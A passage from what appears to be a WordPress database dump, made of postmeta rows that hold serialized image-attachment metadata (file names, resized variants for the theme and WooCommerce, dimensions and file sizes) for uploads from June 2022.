:{s:4:\"file\";s:27:\"bg-footer-right-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40655;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-600x752.png\";s:5:\"width\";i:600;s:6:\"height\";i:752;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133481;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6320;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33,176,'_wp_attached_file','2022/06/bg-header-banner-50.jpg'),(34,176,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:500;s:4:\"file\";s:31:\"2022/06/bg-header-banner-50.jpg\";s:8:\"filesize\";i:128355;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"bg-header-banner-50-300x78.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6312;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"bg-header-banner-50-1024x267.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41572;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5265;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-768x200.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25803;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"bg-header-banner-50-1536x400.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81356;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-768x500.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60711;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27045;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-378x500.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31345;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67610;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"bg-header-banner-50-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15194;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-600x156.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17686;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-header-banner-50-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3016;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36,193,'_wp_attached_file','2022/06/vintage-deign.jpg'),(37,193,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:637;s:4:\"file\";s:25:\"2022/06/vintage-deign.jpg\";s:8:\"filesize\";i:184295;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"vintage-deign-174x300.jpg\";s:5:\"width\";i:174;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15880;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"vintage-deign-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7999;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"vintage-deign-370x473.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43378;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"vintage-deign-370x473.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43378;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"vintage-deign-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23785;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"vintage-deign-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4367;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38,193,'_wxr_import_parent','192'),(39,217,'_wp_attached_file','2022/06/image.jpg'),(40,217,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:570;s:6:\"height\";i:506;s:4:\"file\";s:17:\"2022/06/image.jpg\";s:8:\"filesize\";i:92392;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"image-300x266.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18834;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6482;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:17:\"image-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35783;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:17:\"image-378x506.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41462;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:17:\"image-570x473.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61134;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"image-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20748;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"image-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(41,217,'_wxr_import_parent','192'),(42,230,'_wp_attached_file','2022/06/image-2.jpg'),(43,230,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:570;s:6:\"height\";i:506;s:4:\"file\";s:19:\"2022/06/image-2.jpg\";s:8:\"filesize\";i:93575;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"image-2-300x266.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14748;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"image-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5182;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"image-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27534;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"image-2-378x506.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:506;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31198;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:19:\"image-2-570x473.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45311;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"image-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15875;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"image-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2963;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(44,230,'_wxr_import_parent','192'),(45,576,'_wp_attached_file','2022/06/image-simple-home.jpg'),(46,576,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:473;s:4:\"file\";s:29:\"2022/06/image-simple-home.jpg\";s:8:\"filesize\";i:163138;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"image-simple-home-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9944;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"image-simple-home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5431;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"image-simple-home-768x378.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46996;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:29:\"image-simple-home-768x473.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65493;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:29:\"image-simple-home-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31752;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:29:\"image-simple-home-378x473.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30741;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:29:\"image-simple-home-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76229;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"image-simple-home-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16704;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"image-simple-home-600x296.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30732;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"image-simple-home-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2994;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(47,589,'_wp_attached_file','2022/06/gallery-1.jpg'),(48,589,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:536;s:4:\"file\";s:21:\"2022/06/gallery-1.jpg\";s:8:\"filesize\";i:224409;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"gallery-1-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8273;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"gallery-1-768x412.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83044;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-1-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101526;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-1-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48227;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"gallery-1-378x536.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53920;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"gallery-1-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112441;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"gallery-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27078;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"gallery-1-600x322.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:322;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55360;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4357;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(49,590,'_wp_attached_file','2022/06/gallery-2.jpg'),(50,590,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:21:\"2022/06/gallery-2.jpg\";s:8:\"filesize\";i:282784;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"gallery-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19612;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8420;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"gallery-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105591;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-2-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134918;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53348;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"gallery-2-378x667.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:667;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80340;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"gallery-2-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119778;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"gallery-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28693;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"gallery-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67653;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4345;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51,591,'_wp_attached_file','2022/06/gallery-3.jpg'),(52,591,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2022/06/gallery-3.jpg\";s:8:\"filesize\";i:254477;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"gallery-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21694;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6651;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"gallery-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125759;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113945;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41864;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"gallery-3-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75525;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"gallery-3-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108312;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"gallery-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21694;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"gallery-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79198;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"gallery-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3480;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(53,710,'_wp_attached_file','2022/06/about-get-to-know-us.jpg'),(54,710,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:550;s:4:\"file\";s:32:\"2022/06/about-get-to-know-us.jpg\";s:8:\"filesize\";i:159221;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-273x300.jpg\";s:5:\"width\";i:273;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13989;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5298;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26570;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-378x550.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32249;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-500x473.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35609;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:32:\"about-get-to-know-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15322;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:32:\"about-get-to-know-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2998;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(56,711,'_wp_attached_file','2022/06/background-about-section1.png'),(57,711,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1663;s:6:\"height\";i:799;s:4:\"file\";s:37:\"2022/06/background-about-section1.png\";s:8:\"filesize\";i:80344;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"background-about-section1-300x144.png\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5623;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"background-about-section1-1024x492.png\";s:5:\"width\";i:1024;s:6:\"height\";i:492;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41890;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"background-about-section1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"background-about-section1-768x369.png\";s:5:\"width\";i:768;s:6:\"height\";i:369;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26134;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"background-about-section1-1536x738.png\";s:5:\"width\";i:1536;s:6:\"height\";i:738;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79417;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-about-section1-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1524;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-about-section1-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:437;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:37:\"background-about-section1-378x799.png\";s:5:\"width\";i:378;s